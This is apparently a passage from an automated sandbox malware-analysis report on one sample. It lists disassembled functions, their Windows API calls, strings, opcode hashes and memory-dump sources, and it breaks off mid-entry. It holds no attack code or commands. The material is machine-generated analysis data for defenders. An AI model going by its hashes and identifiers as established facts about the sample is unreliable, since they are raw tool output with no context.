                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$LongWindow_memset
                                                                  • String ID:
                                                                  • API String ID: 830647256-0
                                                                  • Opcode ID: d9a5329e48714dc7b5fd775265a6a5d66f05f4a1946d852fbd18e5054371f6ad
                                                                  • Instruction ID: b3907047b669ae684401fdd4297d8e71c3d642681906dc7b00d0975d13541680
                                                                  • Opcode Fuzzy Hash: d9a5329e48714dc7b5fd775265a6a5d66f05f4a1946d852fbd18e5054371f6ad
                                                                  • Instruction Fuzzy Hash: 10616B75900208AFDB12DFA8CC81FEEB7B8EB09714F14415AFB15EB2A1D774A941DB50
                                                                  Function 003894E1 Relevance: 16.6, APIs: 11, Instructions: 109memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 003894FE
                                                                  • SafeArrayAllocData.OLEAUT32(?), ref: 00389549
                                                                  • VariantInit.OLEAUT32(?), ref: 0038955B
                                                                  • SafeArrayAccessData.OLEAUT32(?,?), ref: 0038957B
                                                                  • VariantCopy.OLEAUT32(?,?), ref: 003895BE
                                                                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 003895D2
                                                                  • VariantClear.OLEAUT32(?), ref: 003895E7
                                                                  • SafeArrayDestroyData.OLEAUT32(?), ref: 003895F4
                                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 003895FD
                                                                  • VariantClear.OLEAUT32(?), ref: 0038960F
                                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0038961A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                  • String ID:
                                                                  • API String ID: 2706829360-0
                                                                  • Opcode ID: c27fdf74fb0d554aa0e9ff9edeca5118e0b7e5d7b3a347e51d7dece4943d261d
                                                                  • Instruction ID: 37efcc91f80928bde4ed5a28b7c24c9fcbea7630aefde3fbed91428e6c48b20e
                                                                  • Opcode Fuzzy Hash: c27fdf74fb0d554aa0e9ff9edeca5118e0b7e5d7b3a347e51d7dece4943d261d
                                                                  • Instruction Fuzzy Hash: 62414131900219AFCB02EFA5DC44AEEBF7DFF08354F048066E512A7261DB70EA45CBA0
                                                                  Function 003ABB08 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 264COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Variant$ClearInit$_memset
                                                                  • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$h?@$|?@
                                                                  • API String ID: 2862541840-1869459913
                                                                  • Opcode ID: c65f9f861e5552ac4944ef8f95ab31da68c149561defbcf20fded93066fa07f8
                                                                  • Instruction ID: 69a4b8192d9b81a3f3b3cb112716184f1e5c39b2de692750a25b89ae49acb7aa
                                                                  • Opcode Fuzzy Hash: c65f9f861e5552ac4944ef8f95ab31da68c149561defbcf20fded93066fa07f8
                                                                  • Instruction Fuzzy Hash: 34919171A00215EBDF26DFA5DC44FAEBBB8EF46710F10855AF515AB282DB709940CFA0
                                                                  Function 003AADAE Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0035936C: __swprintf.LIBCMT ref: 003593AB
                                                                    • Part of subcall function 0035936C: __itow.LIBCMT ref: 003593DF
                                                                  • CoInitialize.OLE32 ref: 003AADF6
                                                                  • CoUninitialize.OLE32 ref: 003AAE01
                                                                  • CoCreateInstance.OLE32(?,00000000,00000017,003DD8FC,?), ref: 003AAE61
                                                                  • IIDFromString.OLE32(?,?), ref: 003AAED4
                                                                  • VariantInit.OLEAUT32(?), ref: 003AAF6E
                                                                  • VariantClear.OLEAUT32(?), ref: 003AAFCF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                  • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                  • API String ID: 834269672-1287834457
                                                                  • Opcode ID: fe1178c4361813001ccbdf0b09eaf4af36530694b508c644d48edfe9d685c0ba
                                                                  • Instruction ID: 0a59b2f668dcfa4e915d58397ba900f26b5668c52868f9ece1f5a5303a173abb
                                                                  • Opcode Fuzzy Hash: fe1178c4361813001ccbdf0b09eaf4af36530694b508c644d48edfe9d685c0ba
                                                                  • Instruction Fuzzy Hash: 1E619C72208B019FD716DF64D848F6AB7E8EF8A714F10451AF9859B2A1C770ED48CB93
                                                                  Function 003A8107 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • WSAStartup.WSOCK32(00000101,?), ref: 003A8168
                                                                  • inet_addr.WSOCK32(?,?,?), ref: 003A81AD
                                                                  • gethostbyname.WSOCK32(?), ref: 003A81B9
                                                                  • IcmpCreateFile.IPHLPAPI ref: 003A81C7
                                                                  • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 003A8237
                                                                  • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 003A824D
                                                                  • IcmpCloseHandle.IPHLPAPI(00000000), ref: 003A82C2
                                                                  • WSACleanup.WSOCK32 ref: 003A82C8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                  • String ID: Ping
                                                                  • API String ID: 1028309954-2246546115
                                                                  • Opcode ID: 63751e0e30786cb85e59a5539f6011c4aacb11fe815e51879460ad057cec7a3c
                                                                  • Instruction ID: 19706d7ee528856355e56123ba451f3560602aca50604ed58aa4951b613ee4fb
                                                                  • Opcode Fuzzy Hash: 63751e0e30786cb85e59a5539f6011c4aacb11fe815e51879460ad057cec7a3c
                                                                  • Instruction Fuzzy Hash: 7151A1316047009FDB22AF64DC49B6ABBE8FF49310F05896AF956DB2A0DB70E805CB41
                                                                  Function 0039E389 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 97COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0039E396
                                                                  • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0039E40C
                                                                  • GetLastError.KERNEL32 ref: 0039E416
                                                                  • SetErrorMode.KERNEL32(00000000,READY), ref: 0039E483
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Error$Mode$DiskFreeLastSpace
                                                                  • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                  • API String ID: 4194297153-14809454
                                                                  • Opcode ID: d7c5afb9951bdddae4440f7063aa8c599b17ba720bb46e61eb8d01e189e5ea86
                                                                  • Instruction ID: 944556dd8fb718246d018949ef7ceb169368cc32d0ffa9ccfd285a7c08d39f54
                                                                  • Opcode Fuzzy Hash: d7c5afb9951bdddae4440f7063aa8c599b17ba720bb46e61eb8d01e189e5ea86
                                                                  • Instruction Fuzzy Hash: 6231B736A002059FDF03EF65D845FBD7BB8EF04705F148026E906EB291DB749A05CB91
                                                                  Function 0038B907 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 0038B98C
                                                                  • GetDlgCtrlID.USER32 ref: 0038B997
                                                                  • GetParent.USER32 ref: 0038B9B3
                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 0038B9B6
                                                                  • GetDlgCtrlID.USER32(?), ref: 0038B9BF
                                                                  • GetParent.USER32(?), ref: 0038B9DB
                                                                  • SendMessageW.USER32(00000000,?,?,00000111), ref: 0038B9DE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$CtrlParent
                                                                  • String ID: ComboBox$ListBox
                                                                  • API String ID: 1383977212-1403004172
                                                                  • Opcode ID: b2178a4451310054c778aba4b17a1493b748b6a8340306810e0beaaab3f37030
                                                                  • Instruction ID: 9cbe72a68cc3369e67aecb2bffd5c4817dce2b5e29bbc02c11af63311e0f0ca9
                                                                  • Opcode Fuzzy Hash: b2178a4451310054c778aba4b17a1493b748b6a8340306810e0beaaab3f37030
                                                                  • Instruction Fuzzy Hash: 7F21D674A00204BFCF06BBA0DC86EBEB778EF45310F500156F951A72E1DBB49919DB60
                                                                  Function 0038B9F0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 80windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 0038BA73
                                                                  • GetDlgCtrlID.USER32 ref: 0038BA7E
                                                                  • GetParent.USER32 ref: 0038BA9A
                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 0038BA9D
                                                                  • GetDlgCtrlID.USER32(?), ref: 0038BAA6
                                                                  • GetParent.USER32(?), ref: 0038BAC2
                                                                  • SendMessageW.USER32(00000000,?,?,00000111), ref: 0038BAC5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$CtrlParent
                                                                  • String ID: ComboBox$ListBox
                                                                  • API String ID: 1383977212-1403004172
                                                                  • Opcode ID: 48cdbcfb0777985ed7bf049fea6f4053be068af38bfda9bfcb4602e101852eeb
                                                                  • Instruction ID: a2e515b3d269a7ad43c62838c1f60a604a572b23e583d6ba7afcd44d358f7278
                                                                  • Opcode Fuzzy Hash: 48cdbcfb0777985ed7bf049fea6f4053be068af38bfda9bfcb4602e101852eeb
                                                                  • Instruction Fuzzy Hash: 5521F574A40204BFDB06BB64CC85EFEB778EF45300F100056F951A71E1DBB99919DB60
                                                                  Function 0038BAD7 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 71windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetParent.USER32 ref: 0038BAE3
                                                                  • GetClassNameW.USER32(00000000,?,00000100), ref: 0038BAF8
                                                                  • _wcscmp.LIBCMT ref: 0038BB0A
                                                                  • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0038BB85
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: ClassMessageNameParentSend_wcscmp
                                                                  • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                  • API String ID: 1704125052-3381328864
                                                                  • Opcode ID: 4dd875ffba829944530551426d2888eb58f8796809369c552523c01c68e7e999
                                                                  • Instruction ID: 1cc2ab800329d65d6ce3672b417c238b9a7b2e48b81e566903b7c3c9f9600ea8
                                                                  • Opcode Fuzzy Hash: 4dd875ffba829944530551426d2888eb58f8796809369c552523c01c68e7e999
                                                                  • Instruction Fuzzy Hash: 7B110A76648307FAFA377624EC0ADA6B79C9B15720F200063F908F40D5FFA598114658
                                                                  Function 003AB2A9 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VariantInit.OLEAUT32(?), ref: 003AB2D5
                                                                  • CoInitialize.OLE32(00000000), ref: 003AB302
                                                                  • CoUninitialize.OLE32 ref: 003AB30C
                                                                  • GetRunningObjectTable.OLE32(00000000,?), ref: 003AB40C
                                                                  • SetErrorMode.KERNEL32(00000001,00000029), ref: 003AB539
                                                                  • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 003AB56D
                                                                  • CoGetObject.OLE32(?,00000000,003DD91C,?), ref: 003AB590
                                                                  • SetErrorMode.KERNEL32(00000000), ref: 003AB5A3
                                                                  • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 003AB623
                                                                  • VariantClear.OLEAUT32(003DD91C), ref: 003AB633
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                  • String ID:
                                                                  • API String ID: 2395222682-0
                                                                  • Opcode ID: 6b7318fefb764e8f60834e5bedff86c66bc44f6b0964791b7f0d1d7b980daeca
                                                                  • Instruction ID: eeb43485134ac15261ecd69e4f5f55cd337d77ac9873d5b7fc04af457669cddd
                                                                  • Opcode Fuzzy Hash: 6b7318fefb764e8f60834e5bedff86c66bc44f6b0964791b7f0d1d7b980daeca
                                                                  • Instruction Fuzzy Hash: 75C105716083019FC702DF65C884A6AB7E9FF8A348F04495DF98A9B262DB71ED05CB52
                                                                  Function 0037ACB3 Relevance: 15.2, APIs: 10, Instructions: 219COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __lock.LIBCMT ref: 0037ACC1
                                                                    • Part of subcall function 00377CF4: __mtinitlocknum.LIBCMT ref: 00377D06
                                                                    • Part of subcall function 00377CF4: EnterCriticalSection.KERNEL32(00000000,?,00377ADD,0000000D), ref: 00377D1F
                                                                  • __calloc_crt.LIBCMT ref: 0037ACD2
                                                                    • Part of subcall function 00376986: __calloc_impl.LIBCMT ref: 00376995
                                                                    • Part of subcall function 00376986: Sleep.KERNEL32(00000000,000003BC,0036F507,?,0000000E), ref: 003769AC
                                                                  • @_EH4_CallFilterFunc@8.LIBCMT ref: 0037ACED
                                                                  • GetStartupInfoW.KERNEL32(?,00406E28,00000064,00375E91,00406C70,00000014), ref: 0037AD46
                                                                  • __calloc_crt.LIBCMT ref: 0037AD91
                                                                  • GetFileType.KERNEL32(00000001), ref: 0037ADD8
                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0037AE11
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                                  • String ID:
                                                                  • API String ID: 1426640281-0
                                                                  • Opcode ID: 1c1082eda6b0246865a3fd0f42fb0e0137d50214f1d89e99492662791d0a0d6a
                                                                  • Instruction ID: fc1aace9a54032ba03f14b4681f8a26449af15546384ef3b2b472b0f67866775
                                                                  • Opcode Fuzzy Hash: 1c1082eda6b0246865a3fd0f42fb0e0137d50214f1d89e99492662791d0a0d6a
                                                                  • Instruction Fuzzy Hash: 0681D671905B458FDB35CF68C84059DBBF4AF49320B24C26DD4AAEB7D1C7389802CB56
                                                                  Function 00394025 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetCurrentThreadId.KERNEL32 ref: 00394047
                                                                  • GetForegroundWindow.USER32(00000000,?,?,?,?,?,003930A5,?,00000001), ref: 0039405B
                                                                  • GetWindowThreadProcessId.USER32(00000000), ref: 00394062
                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,003930A5,?,00000001), ref: 00394071
                                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 00394083
                                                                  • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,003930A5,?,00000001), ref: 0039409C
                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,003930A5,?,00000001), ref: 003940AE
                                                                  • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,003930A5,?,00000001), ref: 003940F3
                                                                  • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,003930A5,?,00000001), ref: 00394108
                                                                  • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,003930A5,?,00000001), ref: 00394113
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                  • String ID:
                                                                  • API String ID: 2156557900-0
                                                                  • Opcode ID: 07a76a9c0d9e24b6440444352ac83428a0dac00a1765af992d5b3c723beadce1
                                                                  • Instruction ID: 9fb31efa6b36e98f6afd6afde9e13b7819ebc32e215d2aa43e6a266c3a971688
                                                                  • Opcode Fuzzy Hash: 07a76a9c0d9e24b6440444352ac83428a0dac00a1765af992d5b3c723beadce1
                                                                  • Instruction Fuzzy Hash: 3031A572600204AFDF12DF64EC45FAA77ADFB54312F11C126F905D6290EBB4DD818BA4
                                                                  Function 003CDD4A Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetSysColor.USER32(00000008), ref: 0036B496
                                                                  • SetTextColor.GDI32(?,000000FF), ref: 0036B4A0
                                                                  • SetBkMode.GDI32(?,00000001), ref: 0036B4B5
                                                                  • GetStockObject.GDI32(00000005), ref: 0036B4BD
                                                                  • GetClientRect.USER32(?), ref: 003CDD63
                                                                  • SendMessageW.USER32(?,00001328,00000000,?), ref: 003CDD7A
                                                                  • GetWindowDC.USER32(?), ref: 003CDD86
                                                                  • GetPixel.GDI32(00000000,?,?), ref: 003CDD95
                                                                  • ReleaseDC.USER32(?,00000000), ref: 003CDDA7
                                                                  • GetSysColor.USER32(00000005), ref: 003CDDC5
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                                  • String ID:
                                                                  • API String ID: 3430376129-0
                                                                  • Opcode ID: 66ecee7c5ff418456fa3ea3d74284e4f620caba4ddcfa087860733794b1fb256
                                                                  • Instruction ID: 7a76136e855df76e8e3204904a68450d5e9d14dd75bcdfd6a488ca1fc4c4279e
                                                                  • Opcode Fuzzy Hash: 66ecee7c5ff418456fa3ea3d74284e4f620caba4ddcfa087860733794b1fb256
                                                                  • Instruction Fuzzy Hash: 8D117931501205AFDB636BB4FC08FA97F6AEB05321F118266FA66950E2CB314991DF20
                                                                  Function 00353093 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 210COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 003530DC
                                                                  • CoUninitialize.OLE32(?,00000000), ref: 00353181
                                                                  • UnregisterHotKey.USER32(?), ref: 003532A9
                                                                  • DestroyWindow.USER32(?), ref: 003C5079
                                                                  • FreeLibrary.KERNEL32(?), ref: 003C50F8
                                                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 003C5125
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
